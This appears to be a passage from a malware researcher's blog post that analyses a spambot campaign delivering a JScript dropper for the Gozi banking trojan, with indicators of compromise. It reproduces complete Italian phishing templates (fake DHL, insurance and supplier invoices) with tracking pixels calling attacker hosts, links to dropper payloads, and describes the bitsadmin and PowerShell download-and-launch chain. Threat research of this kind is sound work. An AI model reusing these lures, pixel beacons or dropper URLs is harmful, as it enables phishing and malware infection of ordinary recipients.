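    for hit in find_beacons(SAMPLE_LOG):
        print("beacon fetched for", hit["email"])
```

The same converter works on the invoice templates further down (they reuse the pixel and {email2} in the body), which makes one regex per template enough to search a mail archive for every rendering.</br>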
<h3>Gozi campaign</h3>
After the fingerprinting campaign, the spambot is used to spread a dropper which leads to Gozi.</br>
This JScript dropper is spread via fake invoices;
</br>some examples of the spam templates used during the campaign:
</br>
DHL invoice:
<textarea rows="20" cols="80"><IMG width=1 height=1 src="http://conceptcreationnv.com/2015/cgi-bin/{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}.gif?{email}" alt="DHL"><br>
<img class="logo" alt="Track DHL Express Shipments" src="http://www.dhl.com/img/meta/dhl_logo.gif" height="48" width="171"><br><br>
Gentile cliente {email2} <br><br>
Notifica, numero di consegna 1{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}<br>
<h2><center><a href="https://docs.google.com/uc?id=0B-a13vsWk4EYRHY1Q2xGZTQ2N0U">
documento stampa</a><center></h2><br>
<sup style="color: #ffffff;">#FILE2</sup><br><br>
Numero d'ordine: {1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}0{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}0{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}<br>
----------------------------------------------------------<br><br>
DHL Supply Chain (Italy) S.p.A.<br>
Sede Legale: Settala, (MI) viale delle industrie 2.<br>
Capitale sociale: Euro 1.548.000,00 diviso in n. 300.000 azioni da Euro 5,16 cad.- versato Euro 1.548.000,00<br><br>
Soci: DHL Holding (Italy) S.r.l. (100%)<br>
Codice Fiscale/Registro Imprese: 00718630155<br>
R.E.A.: MI-618656<br>
Data di costituzione: 18/12/1962<br>
<small style="color: #ffffff;">#FILE1</small><br>
</textarea>
</br></br>
Insurance invoice:
<textarea rows="20" cols="80">
<IMG width=1 height=1 src="http://conceptcreationnv.com/2015/cgi-bin/{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}.gif?{email}" alt="ILOMA"><br>
<img class="logo" alt="ILOMA SRL" src="http://evi-verein.at/templates/css/logoIloma.png" height="48" width="171"><br><br>
Gentile Cliente {email2}<br><br>
Con la presente Vi chiediamo informazioni circa il pagamento 1{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9} euro relativo alle nostre fatture indicate in oggetto.<br><br>
<h2><center><a href="http://www.diamondfitness.hu/css/294DHL.php">
INFORMAZIONI DETTAGLIATE</a><center></h2><br>
Vi ricordiamo che alla sistemazione delle nostre competenze seguira il rimborso della liquidazione da parte della Compagnia Assicuratrice.<br><br>
Cordiali saluti<br>
-------------------------------------------------------<br>
support@iloma.it<br>
cell. +39 328 4975254<br><br>
visita il sito www.iloma.it<br><br>
ILOMA srl<br>
sede legale: Via Coni Zugna, 71 20144 Milano<br>
sede operativa: Via Garibaldi, 38 44121 Ferrara<br>
telefono 0532.240112 - fax 0532.215377<br>
P.IVA e C.F. 08522860967<br>
-------------------------------------------------------<br>
Ricordiamo che ai sensi della legge sulla privacy, nessuno puo leggere e/o visualizzare
il presente messaggio, tranne il destinatario; comunque in caso di erronea ricezione,
Vi preghiamo di provvedere alla distruzione dello stesso, compreso eventuali allegati
</textarea>
</br></br>
Spam targeting hotels:</br>
<textarea rows="20" cols="80">
Hello {email2}.<br><br>
There were difficulties with the registration of rooms at the hotel!<br>
Some of the documents were written in error.<br><br>
Please check our documents, all right now?<br><br>
Thank you!<br>
</textarea>
</br>
Fake invoice:
<textarea rows="20" cols="80">
<IMG width=1 height=1 src="http://{wedarenda.ru|wecanall.ru|webslike.ru|webroyal-demo.ru|webowltest.ru|wayorganic.ru|wattpoint.ru|watchbaza.ru|wapseduction.ru|walltowall.ru|yogurt-land.su|yogurtland.su|vvaz.ru|vtormetgrup.ru|vstr.su|vsrp-samp.ru|vsevservis.ru|vsevenglishhome.ru|vse-kedz.ru|vsekedz.ru|vse-keds.ru|vsekeds.ru|vse-kedi.ru|vsekedi.ru|vsegdaskidki.ru|vseagro.ru|vrline.ru|vrbox63.ru|vprtfl.ru|vozdushnii-syurpriz.ru|vottakda.ru|vota.ru|voshodnews.ru|vorota-doorhan39.ru|volttek.ru|voltea.ru|volinrok.ru|vojnageroev.ru|vodver.ru|vodrus.ru|vodoemclub.ru|vodo-econom.ru|voder24.ru|vodacrimea.ru|vnovdesign.ru|vl-tur.ru|vlovke.ru|vlevkin.ru|vlcustom.ru|vlad-pvh.ru|vkysnayeda.ru|vkverifed.ru|vk-verif.ru|vkusnyj-zavtrak.ru|vkusnyj-uzhin.ru|vkusnye-obedy.ru|vkuseka.ru|vkremain.ru|vkrecovri.ru|vkrecovery.ru}/m/a/{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}{1|2|3|4|5|6|7|8|9}.gif?{email}" alt="Marconigomma"><br>
Buon giorno {email2}<br><br>
In allegato vs. offerta controfirmata, prego prendere nota della correzione alla rag. Sociale della societa'.<br>
NB: servono entrambi gli isolanti, piu' la resistenza.<br>
Il corriere e GLS , prego avvisare quando materiale pronto per organizzare il ritiro.<br>
Le fatture vanno indirizzate come di seguito riportato:<br><br>
<h2><center><a href="http://icrem.it/css/SRL_6849.php">
documento stampa</a><center></h2><br>
Ufficio Amministrazione<br>
Marconigomma SPA con socio unico<br>
Via dell'Europa 28 - 40037 Sasso Marconi (BO) tel. +39 051 841316 fax +39 051 6750157 - 6752016<br><br>
Cordialmente<br>
RGS-Coordinamento Manutenzione<br><br>
Tel. 051 841316 - Fax 051 6750157<br>
-----------------------<br>
Marconigomma Group SPA<br>
Via dell Europa, 28 - 40037 Sasso Marconi BO - C.F./P.IVA/Reg. Imp. 02123801207 - Capitale Sociale 200.430,00 i.v. - REA BO-415402
</textarea>
<a href="https://i.imgur.com/Ncvg0tT.png"><img src="https://i.imgur.com/Ncvg0tT.png" height="95%" width="95%"> </a>
</br>
The first stage is <a href="https://pastebin.com/sEJr2dSY">a dropper in JScript - fattura_93785849.js</a>:</br>
<script src="//pastebin.com/embed_js/XqTE3m3q/noheader"></script>
</br>
The JScript tries to contact www.xxxxxx.xxx/r4.php. <a href="https://pastebin.com/fxLvrM06">r4.php</a> returns another <a href="https://pastebin.com/CYHJ6kpf/noheader">JScript code</a>. This is the main component:</br>
<script src="//pastebin.com/embed_js/CYHJ6kpf/noheader"></script>
</br>
eval(r4.php?cmd=d) returns another JScript used to "drop and launch" Gozi. This script can come in 7 different forms:</br>
<ul>
<li><a href="https://pastebin.com/3DfB0JCT">bitsadmin_dll</a> </li>
<li><a href="https://pastebin.com/4uX9VV09">bitsadmin_exe</a> </li>
<li><a href="https://pastebin.com/ZDqHnfd7">js_dll</a> </li>
<li><a href="https://pastebin.com/dJMnSqbD">js_exe</a> </li>
<li><a href="https://pastebin.com/HP1xR1bn">js_exe_notepad</a> </li>
<li><a href="https://pastebin.com/CZpFZvMJ">powershell_dll</a> </li>
<li><a href="https://pastebin.com/8YPL2jGX">powershell_exe</a> </li>
</ul>
</br>
This dropper is fully in JScript \o/ </br>
The C&C part is open; it's possible to retrieve some statistics:</br>
<a href="https://i.imgur.com/MJY4Cmv.png"><img src="https://i.imgur.com/MJY4Cmv.png" height="95%" width="95%"></a>
</br>
Big picture of this JSDropper:</br>
<a href="https://i.imgur.com/MJAwHTM.png"><img src="https://i.imgur.com/MJAwHTM.png" height="170px"> </a>
</br>I've seen some switching between the JSDropper and doc+macro at times (<a href="https://www.virustotal.com/fr/url/6c8d675e5a2dd055ce54aa0bea80465a128dff5f3da6ddb01ae9a89ed24ff129/analysis/">https://www.virustotal.com/fr/url/6c8d675e5a2dd055ce54aa0bea80465a128dff5f3da6ddb01ae9a89ed24ff129/analysis/</a>)
</br>
It looks like Gozi campaigns are not such a big deal...</br>
</br></br>
<h2>Annexes</h2>
<h3>Spambot</h3>
<ul>
<li>
spambot.exe - <a href="http://vxvault.net/ViriFiche.php?ID=32824">b5c87cab2ff99d1e4b4c3ee897b07869fa8f6a63fbd27018f589c105faf91fcd</a>
</li>
<li>
CheckerSMTPv5.dll - 1cae16cb11c32aaa0cb190189d88811288e06df7cccda6473409de3ea5c7b633
</li>
<li>
MailerSMTPv6.dll - 026df17589f9854a34a49ac097c5f8e3b99473c61e853be18050d458ae20113b
</li>
<li>
Full list of r4.php - <a href="https://pastebin.com/fht6G6pe">https://pastebin.com/fht6G6pe</a>
</li>
<li>
r4.php - <a href="https://pastebin.com/fxLvrM06">https://pastebin.com/fxLvrM06</a>
</li>
</ul>
<h3>Gozi samples</h3>
OTX - <a href="https://otx.alienvault.com/pulse/5851b5d287d2d95d361dd743">https://otx.alienvault.com/pulse/5851b5d287d2d95d361dd743</a></br>
</br>
Benkow_ (http://www.blogger.com/profile/00709869309686004611)